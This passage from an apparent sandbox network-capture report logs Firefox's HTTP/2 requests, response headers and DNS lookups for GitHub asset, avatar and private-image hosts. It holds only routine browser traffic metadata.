                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Thu, 05 Dec 2024 15:49:17 GMT
                          etag: "0x8DD15446086236E"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:47 GMT
                          age: 2649828
                          x-served-by: cache-iad-kcgs7200123-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 4903
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 0e6e42c8ca1520921a06cac72478aafc5dcae388
                          content-length: 6140
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_react-reverse-portal_dist_web_index_js-node_modules_primer_live-region-e-18c5ad-0b67a5a18b33.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_react-reverse-portal_dist_web_index_js-node_modules_primer_live-region-e-18c5ad-0b67a5a18b33.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Fri, 17 Jan 2025 16:44:06 GMT
                          etag: "0x8DD371628B5AA88"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:47 GMT
                          age: 864416
                          x-served-by: cache-iad-kcgs7200106-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 7, 5354
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: a3513cd14a5e122bf233d71f82ad214bd92ecb3d
                          content-length: 14952
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/ui_packages_repos-file-tree-view_repos-file-tree-view_ts-ui_packages_feature-request_FeatureR-648c3b-10a5d1781a97.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/ui_packages_repos-file-tree-view_repos-file-tree-view_ts-ui_packages_feature-request_FeatureR-648c3b-10a5d1781a97.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Fri, 24 Jan 2025 09:19:32 GMT
                          etag: "0x8DD3C58365A96A7"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:47 GMT
                          age: 280421
                          x-served-by: cache-iad-kjyo7100127-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 11, 964
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 9d5820b2e7644a2838982f415ac8f97b59ec195d
                          content-length: 70001
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/react-code-view-a2de824f33c8.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/react-code-view-a2de824f33c8.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          content-type: image/png
                          content-md5: J4WxvtrtOWJpKhhQpMUPqg==
                          last-modified: Wed, 14 Aug 2024 19:20:19 GMT
                          etag: "0x8DCBC9622FDA663"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:57 GMT
                          age: 89
                          x-served-by: cache-iad-kiad7000066-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 1627557, 2
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: f9a9dedc209bd98f29e45ab43ef3e866e268ada4
                          content-length: 5065
                        • flag-us
                          GET
                          https://github.githubassets.com/favicons/favicon.svg
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /favicons/favicon.svg HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: image/avif,image/webp,*/*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/
                          sec-fetch-dest: image
                          sec-fetch-mode: no-cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Fri, 24 Jan 2025 09:19:32 GMT
                          etag: "0x8DD3C58367222F5"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:28:07 GMT
                          age: 280519
                          x-served-by: cache-iad-kjyo7100174-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 6, 1728
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 1887927f09e7f6fb99d8d8e432d1b226cbfee5f0
                          content-length: 22515
                        • flag-us
                          GET
                          https://github.githubassets.com/images/gravatars/gravatar-user-420.png?size=40
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /images/gravatars/gravatar-user-420.png?size=40 HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: image/avif,image/webp,*/*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/
                          sec-fetch-dest: image
                          sec-fetch-mode: no-cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          content-type: image/svg+xml
                          content-md5: bYAvaN8MCaSZfP0o7q/Z/w==
                          last-modified: Wed, 14 Aug 2024 19:18:58 GMT
                          etag: "0x8DCBC95F2647EDF"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:28:08 GMT
                          age: 94
                          x-served-by: cache-iad-kiad7000081-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 1250203, 6
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 80f2f4ad5516f5f528db32690c9fc2e7820ceef0
                          content-length: 959
                        • flag-us
                          GET
                          https://github.githubassets.com/images/gravatars/gravatar-user-420.png?size=40
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /images/gravatars/gravatar-user-420.png?size=40 HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: image/avif,image/webp,*/*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/
                          sec-fetch-dest: image
                          sec-fetch-mode: no-cors
                          sec-fetch-site: cross-site
                          te: trailers
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/repos-overview-aed28e5cf7eb.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/repos-overview-aed28e5cf7eb.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                        • flag-us
                          GET
                          https://github.githubassets.com/favicons/favicon.svg
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /favicons/favicon.svg HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: image/avif,image/webp,*/*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/
                          sec-fetch-dest: image
                          sec-fetch-mode: no-cors
                          sec-fetch-site: cross-site
                          te: trailers
                        • flag-us
                          DNS
                          github.githubassets.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.githubassets.com
                          IN A
                          Response
                          github.githubassets.com
                          IN A
                          185.199.109.154
                          github.githubassets.com
                          IN A
                          185.199.110.154
                          github.githubassets.com
                          IN A
                          185.199.108.154
                          github.githubassets.com
                          IN A
                          185.199.111.154
                        • flag-us
                          DNS
                          avatars.githubusercontent.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          avatars.githubusercontent.com
                          IN A
                          Response
                          avatars.githubusercontent.com
                          IN A
                          185.199.108.133
                          avatars.githubusercontent.com
                          IN A
                          185.199.109.133
                          avatars.githubusercontent.com
                          IN A
                          185.199.110.133
                          avatars.githubusercontent.com
                          IN A
                          185.199.111.133
                        • flag-us
                          DNS
                          github.githubassets.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.githubassets.com
                          IN AAAA
                          Response
                        • flag-us
                          GET
                          https://private-user-images.githubusercontent.com/44542704/353824714-9af0a0be-eda5-4826-a3b6-e3ab436cd974.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mzc5OTkwODAsIm5iZiI6MTczNzk5ODc4MCwicGF0aCI6Ii80NDU0MjcwNC8zNTM4MjQ3MTQtOWFmMGEwYmUtZWRhNS00ODI2LWEzYjYtZTNhYjQzNmNkOTc0LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTAxMjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwMTI3VDE3MjYyMFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTY0YmNiOTg4YmViYTRiMjNmMjgyYTU4OGY0NGE4YWNlZWVhOTc5NjhiMTVjNWEzZDQ0ZGNlMTRhZmI5ODk2YjImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.IGbClDmY_DNYVxglPhNP_7b9LyEfsKHPcdINUygPZtY
                          firefox.exe
                          Remote address:
                          185.199.108.133:443
                          Request
                          GET /44542704/353824714-9af0a0be-eda5-4826-a3b6-e3ab436cd974.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mzc5OTkwODAsIm5iZiI6MTczNzk5ODc4MCwicGF0aCI6Ii80NDU0MjcwNC8zNTM4MjQ3MTQtOWFmMGEwYmUtZWRhNS00ODI2LWEzYjYtZTNhYjQzNmNkOTc0LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTAxMjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwMTI3VDE3MjYyMFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTY0YmNiOTg4YmViYTRiMjNmMjgyYTU4OGY0NGE4YWNlZWVhOTc5NjhiMTVjNWEzZDQ0ZGNlMTRhZmI5ODk2YjImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.IGbClDmY_DNYVxglPhNP_7b9LyEfsKHPcdINUygPZtY HTTP/2.0
                          host: private-user-images.githubusercontent.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: image/avif,image/webp,*/*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/
                          sec-fetch-dest: image
                          sec-fetch-mode: no-cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          x-amz-replication-status: COMPLETED
                          last-modified: Wed, 31 Jul 2024 12:12:48 GMT
                          etag: "99f7b59bb69d6870454d0e3b02b058fc"
                          cache-control: max-age=2592000
                          x-amz-version-id: null
                          content-type: image/png
                          accept-ranges: bytes
                          age: 1094072
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          via: 1.1 varnish
                          x-served-by: cache-lon420100-LON
                          x-cache: HIT
                          x-cache-hits: 0
                          x-timer: S1737998782.730100,VS0,VE1
                          content-security-policy: default-src 'none'; script-src 'none'; img-src 'self'; media-src 'self'; sandbox;
                          x-fastly-request-id: 31cd13d9e1a21a0647602404b235e5f00afc0f97
                          server: GitHub.Cloud
                          strict-transport-security: max-age=31536000; includeSubDomains
                          x-content-type-options: nosniff
                          timing-allow-origin: https://github.com
                          content-length: 109112
                        • flag-us
                          GET
                          https://avatars.githubusercontent.com/u/44542704?v=4&size=40
                          firefox.exe
                          Remote address:
                          185.199.108.133:443
                          Request
                          GET /u/44542704?v=4&size=40 HTTP/2.0
                          host: avatars.githubusercontent.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: image/avif,image/webp,*/*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/
                          sec-fetch-dest: image
                          sec-fetch-mode: no-cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: max-age=300
                          content-security-policy: default-src 'none'
                          content-type: image/png
                          etag: "d49ce3184891e8e0e902596e2f95df08a2f1c8418a4a1f671c1685f3ed3398cb"
                          last-modified: Fri, 14 Feb 2020 15:58:52 GMT
                          strict-transport-security: max-age=31557600
                          timing-allow-origin: https://github.com
                          x-content-type-options: nosniff
                          x-frame-options: deny
                          x-github-tenant:
                          x-xss-protection: 1; mode=block
                          x-github-request-id: DA5B:3BBC6C:129851:186B1C:677D6AD0
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          via: 1.1 varnish
                          x-served-by: cache-lon420100-LON
                          x-cache: HIT
                          x-cache-hits: 0
                          x-timer: S1737998782.345771,VS0,VE1
                          access-control-allow-origin: *
                          cross-origin-resource-policy: cross-origin
                          x-fastly-request-id: cee8274bb7373f3e4dce225d3b1b5527e48a5731
                          expires: Mon, 27 Jan 2025 17:31:22 GMT
                          source-age: 1726187
                          vary: Authorization,Accept-Encoding
                          content-length: 1883
                        • flag-us
                          GET
                          https://avatars.githubusercontent.com/u/44542704?v=4&size=40
                          firefox.exe
                          Remote address:
                          185.199.108.133:443
                          Request
                          GET /u/44542704?v=4&size=40 HTTP/2.0
                          host: avatars.githubusercontent.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: image/avif,image/webp,*/*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/
                          sec-fetch-dest: image
                          sec-fetch-mode: no-cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: max-age=300
                          content-security-policy: default-src 'none'
                          content-type: image/png
                          etag: "d49ce3184891e8e0e902596e2f95df08a2f1c8418a4a1f671c1685f3ed3398cb"
                          last-modified: Fri, 14 Feb 2020 15:58:52 GMT
                          strict-transport-security: max-age=31557600
                          timing-allow-origin: https://github.com
                          x-content-type-options: nosniff
                          x-frame-options: deny
                          x-github-tenant:
                          x-xss-protection: 1; mode=block
                          x-github-request-id: DA5B:3BBC6C:129851:186B1C:677D6AD0
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          via: 1.1 varnish
                          x-served-by: cache-lon420100-LON
                          x-cache: HIT
                          x-cache-hits: 1
                          x-timer: S1737998782.357628,VS0,VE1
                          access-control-allow-origin: *
                          cross-origin-resource-policy: cross-origin
                          x-fastly-request-id: 2977f617104dfc580deba0e7e3a2d558865f87fa
                          expires: Mon, 27 Jan 2025 17:31:22 GMT
                          source-age: 1726187
                          vary: Authorization,Accept-Encoding
                          content-length: 1883
                        • flag-us
                          GET
                          https://avatars.githubusercontent.com/u/44542704?s=64&v=4
                          firefox.exe
                          Remote address:
                          185.199.108.133:443
                          Request
                          GET /u/44542704?s=64&v=4 HTTP/2.0
                          host: avatars.githubusercontent.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: image/avif,image/webp,*/*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/
                          sec-fetch-dest: image
                          sec-fetch-mode: no-cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: max-age=300
                          content-security-policy: default-src 'none'
                          content-type: image/png
                          etag: "9a2efe452d138368bb47150077cf3966a0e8a699137cd76496cedb32fa6eabb0"
                          last-modified: Fri, 14 Feb 2020 15:58:52 GMT
                          strict-transport-security: max-age=31557600
                          timing-allow-origin: https://github.com
                          x-content-type-options: nosniff
                          x-frame-options: deny
                          x-github-tenant:
                          x-xss-protection: 1; mode=block
                          x-github-request-id: 64A5:1BE207:842847:B247BC:67737202
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          via: 1.1 varnish
                          x-served-by: cache-lon420100-LON
                          x-cache: HIT
                          x-cache-hits: 0
                          x-timer: S1737998782.453201,VS0,VE1
                          access-control-allow-origin: *
                          cross-origin-resource-policy: cross-origin
                          x-fastly-request-id: 77ff4b61dae0073a6a65a0a15abf41a9794fcc29
                          expires: Mon, 27 Jan 2025 17:31:22 GMT
                          source-age: 2379706
                          vary: Authorization,Accept-Encoding
                          content-length: 3043
                        • flag-us
                          GET
                          https://avatars.githubusercontent.com/u/39349444?s=64&v=4
                          firefox.exe
                          Remote address:
                          185.199.108.133:443
                          Request
                          GET /u/39349444?s=64&v=4 HTTP/2.0
                          host: avatars.githubusercontent.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: image/avif,image/webp,*/*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/
                          sec-fetch-dest: image
                          sec-fetch-mode: no-cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: max-age=300
                          content-security-policy: default-src 'none'
                          content-type: image/png
                          etag: "bbd78d1ccf4743a85b2c5003d9d579945b57235f0c8533ffd5c94ea947c970c8"
                          last-modified: Sun, 19 Mar 2023 14:46:52 GMT
                          strict-transport-security: max-age=31557600
                          timing-allow-origin: https://github.com
                          x-content-type-options: nosniff
                          x-frame-options: deny
                          x-github-tenant:
                          x-xss-protection: 1; mode=block
                          x-github-request-id: EB19:80D7E:112896:15F3E1:67871004
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          via: 1.1 varnish
                          x-served-by: cache-lon420100-LON
                          x-cache: HIT
                          x-cache-hits: 0
                          x-timer: S1737998782.460063,VS0,VE1
                          access-control-allow-origin: *
                          cross-origin-resource-policy: cross-origin
                          x-fastly-request-id: 474f6346e7527fe7fd5bbf25145c44f06b15ea55
                          expires: Mon, 27 Jan 2025 17:31:22 GMT
                          source-age: 1094073
                          vary: Authorization,Accept-Encoding
                          content-length: 2493
                        • flag-us
                          GET
                          https://avatars.githubusercontent.com/u/51242428?s=64&v=4
                          firefox.exe
                          Remote address:
                          185.199.108.133:443
                          Request
                          GET /u/51242428?s=64&v=4 HTTP/2.0
                          host: avatars.githubusercontent.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: image/avif,image/webp,*/*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/
                          sec-fetch-dest: image
                          sec-fetch-mode: no-cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: max-age=300
                          content-security-policy: default-src 'none'
                          content-type: image/jpeg
                          etag: "bcbeb95c3f21364aef292d9e6c261374e079265660dda6145e13de8a5be8546f"
                          last-modified: Tue, 19 May 2020 23:35:43 GMT
                          strict-transport-security: max-age=31557600
                          timing-allow-origin: https://github.com
                          x-content-type-options: nosniff
                          x-frame-options: deny
                          x-github-tenant:
                          x-xss-protection: 1; mode=block
                          x-github-request-id: 6F31:0942:2631D7:355E82:678F5DC3
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          via: 1.1 varnish
                          x-served-by: cache-lon420100-LON
                          x-cache: HIT
                          x-cache-hits: 0
                          x-timer: S1737998782.469299,VS0,VE1
                          access-control-allow-origin: *
                          cross-origin-resource-policy: cross-origin
                          x-fastly-request-id: c6d70c49a9c5aed48108f5aeb850e54e5301aad5
                          expires: Mon, 27 Jan 2025 17:31:22 GMT
                          source-age: 549883
                          vary: Authorization,Accept-Encoding
                          content-length: 1590
                        • flag-us
                          GET
                          https://avatars.githubusercontent.com/u/63458929?s=64&v=4
                          firefox.exe
                          Remote address:
                          185.199.108.133:443
                          Request
                          GET /u/63458929?s=64&v=4 HTTP/2.0
                          host: avatars.githubusercontent.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: image/avif,image/webp,*/*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/
                          sec-fetch-dest: image
                          sec-fetch-mode: no-cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: max-age=300
                          content-security-policy: default-src 'none'
                          content-type: image/png
                          etag: "e25efc2f3c542a995df70f85198b7fd6184be4700ec9756e00c0a8fd9e7a124c"
                          last-modified: Mon, 22 Dec 2014 15:51:20 GMT
                          strict-transport-security: max-age=31557600
                          timing-allow-origin: https://github.com
                          x-content-type-options: nosniff
                          x-frame-options: deny
                          x-github-tenant:
                          x-xss-protection: 1; mode=block
                          x-github-request-id: 2212:0866:628B62:82E1ED:677410E2
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          via: 1.1 varnish
                          x-served-by: cache-lon420100-LON
                          x-cache: HIT
                          x-cache-hits: 0
                          x-timer: S1737998782.472828,VS0,VE1
                          access-control-allow-origin: *
                          cross-origin-resource-policy: cross-origin
                          x-fastly-request-id: a6bda2493dc1c7e5076854c178ddeb92d5906cc4
                          expires: Mon, 27 Jan 2025 17:31:22 GMT
                          source-age: 2339035
                          vary: Authorization,Accept-Encoding
                          content-length: 1505
                        • flag-us
                          GET
                          https://avatars.githubusercontent.com/u/17717494?s=64&v=4
                          firefox.exe
                          Remote address:
                          185.199.108.133:443
                          Request
                          GET /u/17717494?s=64&v=4 HTTP/2.0
                          host: avatars.githubusercontent.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: image/avif,image/webp,*/*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/
                          sec-fetch-dest: image
                          sec-fetch-mode: no-cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: max-age=300
                          content-security-policy: default-src 'none'
                          content-type: image/png
                          etag: "7a5751dd3780350bcf03cdf472fce0c8286cf0c843fede517d47c2031c586909"
                          last-modified: Sun, 20 Oct 2024 19:29:56 GMT
                          strict-transport-security: max-age=31557600
                          timing-allow-origin: https://github.com
                          x-content-type-options: nosniff
                          x-frame-options: deny
                          x-github-tenant:
                          x-xss-protection: 1; mode=block
                          x-github-request-id: 0834:24EA37:59796:7D27E:678F84AF
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          via: 1.1 varnish
                          x-served-by: cache-lon420100-LON
                          x-cache: HIT
                          x-cache-hits: 0
                          x-timer: S1737998782.476150,VS0,VE1
                          access-control-allow-origin: *
                          cross-origin-resource-policy: cross-origin
                          x-fastly-request-id: 16d9ea0930063c4d28cf2d4f5f5b2a7a2eb30f07
                          expires: Mon, 27 Jan 2025 17:31:22 GMT
                          source-age: 539918
                          vary: Authorization,Accept-Encoding
                          content-length: 3731
                        • flag-us
                          GET
                          https://private-user-images.githubusercontent.com/44542704/353824714-9af0a0be-eda5-4826-a3b6-e3ab436cd974.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mzc5OTkxODcsIm5iZiI6MTczNzk5ODg4NywicGF0aCI6Ii80NDU0MjcwNC8zNTM4MjQ3MTQtOWFmMGEwYmUtZWRhNS00ODI2LWEzYjYtZTNhYjQzNmNkOTc0LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTAxMjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwMTI3VDE3MjgwN1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWQ1ZmIwNDM4Nzg3NzQ3NmYwMmU1NWJhZmNlMjg0MzM1M2FmOTJjOWY3ZTNlOWQxZmZiN2E4NzlmMjFkYmZlOWMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.w6Ayr3_N9Rcc8rSf9BjA1rw0L28iAUWurI7vkbOrU0Q
                          firefox.exe
                          Remote address:
                          185.199.108.133:443
                          Request
                          GET /44542704/353824714-9af0a0be-eda5-4826-a3b6-e3ab436cd974.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mzc5OTkxODcsIm5iZiI6MTczNzk5ODg4NywicGF0aCI6Ii80NDU0MjcwNC8zNTM4MjQ3MTQtOWFmMGEwYmUtZWRhNS00ODI2LWEzYjYtZTNhYjQzNmNkOTc0LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTAxMjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwMTI3VDE3MjgwN1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWQ1ZmIwNDM4Nzg3NzQ3NmYwMmU1NWJhZmNlMjg0MzM1M2FmOTJjOWY3ZTNlOWQxZmZiN2E4NzlmMjFkYmZlOWMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.w6Ayr3_N9Rcc8rSf9BjA1rw0L28iAUWurI7vkbOrU0Q HTTP/2.0
